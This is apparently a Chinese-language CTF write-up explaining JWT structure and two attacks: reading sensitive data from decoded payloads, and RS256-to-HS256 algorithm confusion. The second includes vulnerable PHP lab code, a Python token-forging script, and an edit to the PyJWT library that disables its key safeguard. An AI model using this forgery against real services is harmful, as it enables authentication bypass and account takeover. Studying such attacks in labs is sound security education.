前言
在2022祥云杯时遇到有关jwt的题,当时没有思路,对jwt进行学习后来对此进行简单总结,希望能对正在学习jwt的师傅们有所帮助。
jwt
jwt,它是一种用于通信双方之间传递安全信息的简洁的、URL安全的表述性声明规范,是一种标准化的格式,用于在系统之间发送经过加mi签名的JSON数据,理论上可以包含任何类型的数据,但最常用于发送关于用户的信息(“声明”),以进行身份认证、会话处理和访问控制。
简单了解了它的定义后,我们接下来来看一下jwt的组成部分它分为三个部分,如下所示
1、Headers:头部
2、Payload:有效载荷
3、Signature:签名这三个部分以.符号来连接
Headers
Headers通常由两部分组成,令牌的类型和签名算法,常见的算法有很多种,例如 HMAC SHA256或 RSA。但它也还有一个kid参数,这是一个可选参数,全称是key ID,它用于指定加mi算法的密miyao。
示例如下
ewogICJhbGciOiAiSFMyNTYiLAogICJ0eXAiOiAiSldUIgp9这就是一个Headers,当我们对它进行Base64解码就可以看到它的具体内容,具体如下
{
"alg": "HS256",
"typ": "jwt"
}alg指的就是算法,这里的算法就是HS256,typ指的是令牌类型。这里需要说明一点,就是明文在加mi时其实采用的是Base64URL加mi,这种加mi方式并非Base64encode+URLencode,而是对一些特殊字符进行了替换,具体说明如下
jwt 作为一个令牌,有些场合可能会放到 URL(比如 api.example.com/?token=xxx)。Base64有三个字符+、/和=,在 URL 里面有特殊含义,所以要被替换掉:=被省略、+替换成-,/替换成_ 。这就是 Base64URL 算法。
Payload
有效载荷就是存放有效信息的地方,其中包含声明。声明包含三个部分 1、已注册声明这个部分的话就是已经预先定义过的声明,常见的声明主要有以下几种
iss: jwt签发者
sub: jwt所面向的用户
aud: 接收jwt的一方
exp: jwt的过期时间,这个过期时间必须要大于签发时间
nbf: 定义在什么时间之前,该jwt都是不可用的.
iat: jwt的签发时间
jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。2、公共的声明这些可以由使用 jwt 的人随意定义,一般用于添加用户的相关信息或其他业务需要的必要信息。但不建议添加mingan信息,因为该部分在客户端可进行解码.3、私有的声明这些是为在同意使用它们的各方之间共享信息而创建的自定义声明,私有声明是提供者和消费者所共同定义的声明,一般不建议存放mingan信息。
示例如下
ewoJInN1YiI6ICJhZG1pbiIsCiAgICAidXNlcl9yb2xlIiA6ICJhZG1pbiIsCiAgICAiaXNzIjogImFkbWluIiwKICAgICJpYXQiOiAxNTczNDQwNTgyLAogICAgImV4cCI6IDE1NzM5NDAyNjcsIAogICAgIm5iZiI6IDE1NzM0NDA1ODIsIAogICAgImp0aSI6ICJkZmY0MjE0MTIxZTgzMDU3NjU1ZTEwYmQ5NzUxZDY1NyIgICAKfQ进行base64URL解码,结果如下
{
"sub": "admin", //jwt所面向的用户
"user_role" : "admin", //当前登录用户
"iss": "admin", //该jwt的签发者,有些是URL
"iat": 1573440582, //签发时间
"exp": 1573940267, //过期时间
"nbf": 1573440582, //该时间之前不接收处理该Token
"jti": "dff4214121e83057655e10bd9751d657" //Token唯一标识
}Signature
由于头部和有效载荷以明文形式存储,因此,需要使用签名来防止数据被篡改。所以这部分是一个签证信息,这个签证信息由三部分组成
1、header (base64URL编码)
2、payload (base64URL编码)
3、secret(miyao)它的计算方式如下
Signature=HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)
//假设这里是HS256算法,如果是其他算法的话开头设置为其他算法即可现在了解了jwt的大致作用和其组成,接下来来学习一下jwt攻击。
【----帮助网安学习,需要网安学习资料关注我,私信回复“资料”免费获取----】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
jwt 攻击
jwt攻击有多种情况,现在来对其进行逐一讲解。
mingan信息xielou
jwt保证的是数据传输过程中的完整性而不是机密性。
因为jwt的payload部分是使用Base64url编码的,所以它其实是相当于明文传输的,当payload中携带了mingan信息时,我们对payload部分进行Base64url解码,就可以读取到payload中携带的mingan信息。
靶场演示
题目描述如下
jwt的头部和有效载荷这两部分的数据是以明文形式传输的,如果其中包含了mingan信息的话,就会发生mingan信息xielou。试着找出FLAG。格式为 flag{}
进入环境后发现一个登录框
随便输入zhanghao mima,登录后发现界面如下
查看此时的jwt
想到题目中说头部和载荷可能会有敏感泄露,将值取出分别进行Base64URL解码
两处拼接一下,得到ctfhub{bb89d985db8cea6a2f2d34cb}
算法修改攻击
首先来简述一下jwt中两个常用的加mi算法
HMAC(HS256):是一种对称mi算法,使用秘密miyao对每条消息进行签名和验证RSA(RS256):是一种非对称mi算法,使用私yaomi明文,公yao解mi。
从上面不难看出,HS256自始至终只有一个miyao,而RS256是有两个miyao的。在通常情况下,HS256的miyao我们是不能取到的,RS256的miyao也是很难获得的,RS256的的公yao相对较容易获取,但无论是HS256加mi还是RS256加mi,都是无法实现伪造jwt的,但当我们修改RSA256算法为HS256算法时,后端代码会使用公yao作为miyao,然后用HS256算法验证签名,如果我们此时有公yao,那么此时我们就可与实现jwt的伪造。
靶场演示
题目描述
有些jwt库支持多种mima算法进行签名、验签。若目标使用非对称mima算法时,有时攻击者可以获取到公yao,此时可通过修改jwt头部的签名算法,将非对称mima算法改为对称mima算法,从而达到攻击者目的。
进入环境后发现题目代码
class jwtHelper {
public static function encode($payload=array(), $key='', $alg='HS256') {
return jwt::encode($payload, $key, $alg);
}
public static function decode($token, $key, $alg='HS256') {
try{
$header =jwtHelper::getHeader($token);
$algs = array_merge(array($header->alg, $alg));
return jwt::decode($token, $key, $algs);
} catch(Exception $e){
return false;
}
}
public static function getHeader($jwt) {
$tks = explode('.', $jwt);
list($headb64, $bodyb64, $cryptob64) = $tks;
$header = jwt::jsonDecode(jwt::urlsafeB64Decode($headb64));
return $header;
}
}
$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (!empty($_POST['username']) && !empty($_POST['password'])) {
$token = "";
if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'admin',
);
$token = jwtHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
} else {
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'guest',
);
$token = jwtHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
}
@setcookie("token", $token, time()+1800);
header("Location: /index.php");
exit();
} else {
@setcookie("token", "");
header("Location: /index.php");
exit();
}
} else {
if(!empty($_COOKIE['token']) && jwtHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
$obj = jwtHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
if ($obj->role === 'admin') {
echo $FLAG;
}
} else {
show_source(__FILE__);
}
}
?>简单的看一下,大致意思就是当以用户名为admin,mima不是$flag时,此时登录后jwt中payload的role是guest,而只有当role为admin时才能够得到Flag,所以我们这里肯定是需要伪造jwt的,我们先以admin为用户名,随便输入mima登录一下此时得到jwt,将其拿去解mi一下
发现加mi方式是RS256非对称加mi,想到在登录时,下方给出了公yao
所以这里就可以尝试更改算法为HS256,以公yao作为miyao来进行签名和验证,因此我们构造一个伪造jwt的脚本,内容如下
import jwt
import base64
public ="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqizf1rnxqfeyCAp52TQO
3uEyeB1HzqqbO8FBHWqLlhgmyPFqaopXVhZryzP+Sd6a3iQd8xeD7URswPHE4roA
kbI1GMta9zAdD1yPtp//JNZ55hx1iFY2n9gw2u8VL64n9sCc56H46L3W52Z37kvW
q5LuoLAuyJpP7Ofadt7biWaeXibZGQjPwlbCy31DyxdDFCt8pVrajVI97w3amHBU
Xhd0Ku+DOq9hjadtQbTkbIkAUR84yqt+25EXd/rg1w8we9ysNcTjAeUayRGPuQmX
UWJaFpsvuL7WeUb2xJqvieFwsCQppS1ZgaoRc0F835K+G3s3qWRi4AnvZxryfTzl
awIDAQAB
-----END PUBLIC KEY-----
"""
payload={ "username": "admin","role": "admin"}
print(jwt.encode(payload, key=public, algorithm='HS256'))此时运行完后发现报错
这个是因为源代码中进行了校验,我们简单设置一下即可,源代码文件地址如下
/usr/lib/python3/dist-packages/jwt/algorithms.py我们在它的校验前面增加这样一句话
invalid_strings=[]此时保存退出,再运行文件即可得到新jwt
将新的JWT拿到网站中替换旧的JWT,刷新网站即可得到flag
全部完整内容请至合天网安实验室网站浏览。